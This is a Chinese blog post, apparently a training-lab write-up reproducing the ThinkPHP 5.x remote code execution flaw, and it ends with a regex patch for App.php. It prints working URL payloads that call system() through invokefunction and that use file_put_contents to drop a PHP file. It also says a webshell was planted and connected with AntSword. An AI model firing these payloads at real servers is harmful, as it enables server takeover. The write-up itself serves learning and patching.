ThiThinkPHP5.x 远程函数执行

已于 2022-03-06 16:54:49 修改
阅读量689 收藏
点赞数 1
文章标签: sql php
于 2021-08-31 09:15:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51213906/article/details/120009851
版权
正文

实验地址:ThinkPHP5.x 远程函数执行与sql注入_安全龙-专注做企业网络安全服务与网络安全培训! (anquanlong.com)

知识梳理:

PoC,全称“Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。

Exp,全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。

Payload,中文“有效载荷”,指成功 exploit 之后,真正在目标系统执行的代码或指令。

Shellcode,简单翻译“shell 代码”,是 Payload 的一种,由于其建立正向/反向 shell 而得名。

在这里插入图片描述

(用蚁剑连上之后,发现这是安全龙部署在阿里云上的环境)

​ 首先尝试了远程函数漏洞的初始语句:

?s=index/\think\app/invokefunction&function=system&return_value=&command=

可执行Linux命令
在这里插入图片描述

然后我们按照提示去写入一个文件,phpinfo的功能

利用到了file_put_contents函数(POC分析)

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=./test.php&vars[1][]=<?php%20phpinfo();?>

在这里插入图片描述

回显出了数字18,表示我们写入文件成功

接着进行访问

test.php
在这里插入图片描述

出现如上页面,成功利用漏洞。

接着我还尝试了一句话木马的写入,答案显然,也是可以写入并利用的。

最后蚁剑连接即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用完漏洞,对于我们来说最重要的学会去修复

接下来学习修复这个漏洞

1.添加一段代码到App.php的554行

if (!preg_match('/^[A-Za-z](\w)*$/', $controller)) {

throw new HttpException(404, 'controller not exists:' . $controller);

}

在这里插入图片描述

修改之后,使用原来的poc发现失效了

漏洞修复成功。
在这里插入图片描述

4v1d
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
ThinkPHP5远程代码执行exp利用工具safe6
safe6
12-12 7024
影响范围:ThinkPHP 5.0 - 5.1版本。 危害:远程代码执行 目前,ThinkPHP已发布新版本修复此漏洞,请广大ThinkPHP站长尽快升级: https://blog.thinkphp.cn/869075   2018.12.11 说明: 漏洞检测,5.0和5.1都可以检测。 命令执行,文件上传只支持5.0版本tp。5.1和5.0利用大同小异,不打算写。这只是个练手...
Python3.x+Pyqt5制作GUI界面的案例
05-31
本案例集专注于Python3.x和Pyqt5的结合,提供了一系列实践示例,帮助开发者掌握如何设计和实现GUI界面。 首先,PyQt5是Qt库的Python绑定,Qt库本身是跨平台的,支持Windows、Linux、macOS等多个操作系统。PyQt5提供...
ThinkPHP5.0.x 远程代码执行
LYJ20010728的博客
08-16 1148
ThinkPHP5.0.x 远程代码执行漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在 .php 文件中,攻击者通过精心构造的 payload ,即可将 webshell 写入缓存文件。缓存文件的名字和目录均可预测出来,一旦缓存目录可访问或结合任意文件包含漏洞,即可触发 远程代码执行漏洞 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.10 初始配置 获取测试环境代码
thinkphp5.x 引入layui的分页
最新发布
weixin_62291378的博客
06-06 1371
tp框架调用layui的分页
【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
weixin_34314962的博客
12-11 4107
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 5031
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell)
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
ThinkPHP v5.x中,这种漏洞可能存在于某些未正确过滤或验证的用户输入点,比如模型、控制器或服务层的函数。一旦攻击者找到合适的入口点,他们可以构造特定的请求来触发命令执行,从而执行任意系统命令。 Get...
RTC远程函数演示.rar
06-26
RTC技术的核心在于如何高效、安全地传输和执行远程调用的指令,以及如何正确处理返回的结果。 通过分析这个压缩包内的文件,我们可以学习到如何在Delphi中集成和使用RTC组件来实现远程函数调用,从而扩展我们的应用...
Python3.x+Pyqt5实现主窗体与子窗体相互传数据、传字符、传值;主要使用了信号与槽的方法
08-09
Python3.x+Pyqt5实现主窗体与子窗体相互传数据、传字符、传值;主要使用了信号与槽的方法。
node.js中RPC(远程过程调用)的实现原理介绍
10-25
5. 客户端通过代理函数调用远程函数,发送请求。 6. 服务器接收请求,执行函数,然后返回结果。 7. 客户端接收结果,调用本地回调函数处理结果。 这种实现方式简化了分布式系统中的跨进程通信,使得开发人员可以像...
php调用远程url的六种方法,php函数
07-25
php调用远程url的六种方法,php函数
thinkphp5.X-Batch-getshell-master.rar
03-31
thinkphp5各版本通用poc
精通Windows.API-函数、接口、编程实例.pdf
01-27
6.3.3 创建远程线程、将代码注入其他进程中执行 167 6.3.4 创建纤程、删除纤程、调度纤程 170 6.3.5 纤程与线程的互相转换 171 6.4 进程状态信息 176 6.4.1 PS API与Tool help API 176 6.4.2 遍历系统中...
易语言源码易语言创建远程线程源码.rar
03-30
5. **等待或同步**:根据需求,可能需要使用`等待线程`或`挂起线程`等函数来控制线程执行。 6. **清理资源**:完成任务后,记得释放资源,如关闭进程句柄、卸载DLL等。 创建远程线程在安全性和合法性方面需要注意,...
mapminmax .m与boiler_process.m函数
08-11
`y = (x - min(x)) / (max(x) - min(x))` 其中,`y`是归一化后的值,`x`是原始值,`min(x)`和`max(x)`分别是原始数据集的最小值和最大值。这种线性变换确保了所有数据点被映射到0到1的范围内。 `boiler_process.m`...
ThinkPHP5.0.x远程执行漏洞分析与复现
qq_74148743的博客
05-11 1093
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞由ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
【漏洞复现】ThinkPHP5.x远程代码执行
Kris__zhang的博客
04-23 484
一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。 二、漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 三、漏洞复现 1、官网下载Thinkphp 5
Thinkphp框架 5.x远程命令执行漏洞复现
AzVoidSUN的博客
07-06 450
thinkphp 编辑 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。 [1] ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007
COMSOL Multiphysics V4.x函数定义用户指南
"COMSOL_Multiphysics函数定义用户指南.pdf" COMSOL Multiphysics是一款由瑞典COMSOL公司开发的高级数值仿真软件,它主要用于解决多物理场的直接耦合分析问题。该软件以其强大的功能和灵活性,被业界公认为是首款...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值